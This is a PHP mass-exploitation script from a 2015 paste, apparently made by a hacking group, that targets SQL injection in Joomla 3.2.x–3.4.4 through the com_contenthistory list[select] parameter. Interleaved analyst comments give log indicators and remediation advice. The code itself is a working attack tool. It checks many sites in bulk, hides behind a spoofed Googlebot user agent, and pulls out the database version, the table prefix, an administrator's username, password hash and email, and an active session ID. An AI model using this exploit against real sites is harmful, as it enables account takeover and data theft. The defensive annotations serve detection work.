CYBERSERKERS

JOOMLA SQL v3.2.x - 3.4.4

Nov 15th, 2015
  1. <?php
     // Analyst summary (annotations only; the listing itself is unchanged).
     // This is a web-form bulk checker: the operator pastes one base URL per line,
     // and for each URL the script requests
     //   index.php?option=com_contenthistory&view=history
     // with SQL text placed in the list[select] query parameter, then pulls values
     // out of the response body (presumably a database error echoed by the site).
     // The paste title gives the affected range as Joomla 3.2.x - 3.4.4.
     //
     // What a defender can look for in web/WAF logs:
     //   - option=com_contenthistory&view=history with a non-empty list[select],
     //     especially containing "polygon(" and "/*!00000" versioned comments;
     //   - the fixed parameters list[ordering]= (empty), item_id=75, type_id=1;
     //   - the hex marker 0x6d616769636f ("magico") and separator 0x7e3a ("~:");
     //   - a User-Agent claiming Googlebot (set in data()).
     // A host that answered the first request receives two more. The last one targets
     // the <prefix>_users and <prefix>_session tables, so on a host where these
     // requests succeeded, treat account credentials and active sessions as exposed:
     // reset them, invalidate sessions, and upgrade past the range in the paste title.

     // Lifts PHP's execution time limit ("@" hides any warning), so long URL lists run to completion.
  2. @set_time_limit(0);
     // Emits the operator-facing page: a textarea named "ss" and a submit button named "g".
  3. echo'<meta content=XPLOITER BY AZZATSSINS CYBERSERKERS OF PSYCHOPATH name=description>
  4. <title>!!!- JOOMLA SQL | AZZATSSINS | BN-IDBTE4M -!!!</title>
  5. <body style=color: #000000;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;>
  6. <center>
  7. <form method="post">
  8. <textarea name="ss" cols="30" rows="15" ></textarea><br>
  9. <input name="g" type="submit" value="EXECUTE"/>
  10. </form>
  11. </center>';
     // Both POST fields are read unconditionally; the isset() below only tests the copy in $g.
  12. $g = $_POST['g'];   $ss = $_POST['ss'];
  13. if(isset($g)){
     // The target list is split on CRLF only.
  14. $arr = explode("\r\n",$ss);
  15.  
  16.         foreach($arr as $url){
  17.         $url = @trim($url);
             // $py1 (URL-encoded) asks the database for version() and user(), joined by "~:"
             // behind the "magico" marker so the values can be found in the response text.
  18.         $py1="polygon%28%28/*!00000select*/*/*!00000from*/%28/*!00000select*/*/*!00000from*/%28/*!00000select*/concat_ws%280x7e3a,0x6d616769636f,version%28%29,user%28%29%29as%20mk%29%60%60%29%60%60%29%29";
             // $py2 asks for one table name in the current schema matching
             // 0x25636f6e74656e745f7479706573 ("%content_types").
  19.         $py2="polygon((/*!00000select*/*/*!00000from*/(/*!00000select*/*/*!00000from*/(/*!00000select*/concat_ws(0x7e3a,0x6d616769636f,(/*!00000select*//*!00000table_name*//*!00000from*//*!00000information_schema*/.tables/*!00000where*/table_schema=database() and/*!00000table_name*/like 0x25636f6e74656e745f7479706573 limit 0,1))as mk)``)``))";
     // Every request URL in this script differs only in the list[select] value.
  20. $site = "$url/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=$py1";
  21. $site2 = "$url/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=$py2";
  22.  
  23.         $src= data($site);
             // A host is reported as "vuln" solely when the response body contains
             // select 'magico~:<a>~:<b>' AS ; <a> and <b> are printed as version and db user.
  24.         preg_match("#select 'magico~:(.*?)~:(.*?)' AS#",$src,$m);
  25.  
  26.             if(!empty($m[1])){
  27.             echo "----------------------------------------------------------</font><br>";
  28.             echo "<b>[#] $url : vuln<b><br></font><br>";   
  29.             echo "<font color=lime>[+] version : $m[1]</font><br>";
  30.             echo "<font color=lime>[+] user db : $m[2]</font><br>";
                 // Second request to the same host (visible in its access log).
  31.             $src2= data($site2);
                 // The table prefix is whatever precedes "_users" after "LEFT JOIN";
                 // the pattern is applied to $src.
  32.             preg_match("#LEFT JOIN (.*?)_users#",$src,$m2);
  33.             echo "<font color=lime>[+] prefix : ".$m2[1]."_</font><br>";
  34.             $prfx = $m2[1];
                 // $py3 asks for username, password and email of the lowest-id row in
                 // <prefix>_users, plus the most recent session_id in <prefix>_session.
                 // This is the data to treat as disclosed on a confirmed hit.
  35.             $py3="polygon((/*!00000select*/*/*!00000from*/(/*!00000select*/*/*!00000from*/(/*!00000select*/concat_ws(0x7e3a,(/*!00000select*/concat_ws(0x7e3a,0x6d616769636f,username,password,email)+/*!00000from*/+"."$prfx"."_users+order+by+id+ASC+limit+0,1),(/*!00000select*/session_id+/*!00000from*/+"."$prfx"."_session+order+by+time+DESC+limit+0,1))as+mk)``)``))";
  36. $site3 = "$url/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=$py3";
                 // Third request; four "~:"-separated fields are expected after the marker.
  37.             $src3= data($site3);
  38.             preg_match("/select 'magico\~:(.*?)\~:(.*?)\~:(.*?)\~:(.*?)' AS/",$src3,$m3);
  39.             echo "<font color=lime>[+] user : $m3[1]</font><br>";
  40.             echo "<font color=lime>[+] pass : $m3[2]</font><br>";
  41.             echo "<font color=lime>[+] email : $m3[3]</font><br>";
  42.             echo "<font color=lime>[+] session_id : $m3[4]</b></font><br>";
  43.                
                 // No marker in the first response: the host is reported as not vulnerable
                 // and receives no further requests.
  44.             }else{echo "----------------------------------------------------------</font><br>";
  45.             echo "<font color=red> [-]$url : Not Vuln </font><br>";
  46.             }
  47.    
  48.         }
  49. }
  50. function data($vln){
  51.  
             // HTTP fetch helper used for every request in this script.
             // $vln is the full request URL; the curl_exec() result is returned as-is
             // (the response body as a string, because CURLOPT_RETURNTRANSFER is set).
  52.         $curl = curl_init();
  53.         curl_setopt($curl, CURLOPT_URL, $vln);
  54.         curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
             // TLS certificate verification is switched off.
  55.         curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
             // Redirects are followed.
  56.         curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
             // The User-Agent claims to be Googlebot. Detection note: a User-Agent string is
             // client-supplied, so crawler allow-lists should confirm the source address
             // (e.g. reverse and forward DNS) rather than trust this header.
  57.         curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
  58.         $source = curl_exec($curl);
  59.         return $source;
  60. }
  61. ?>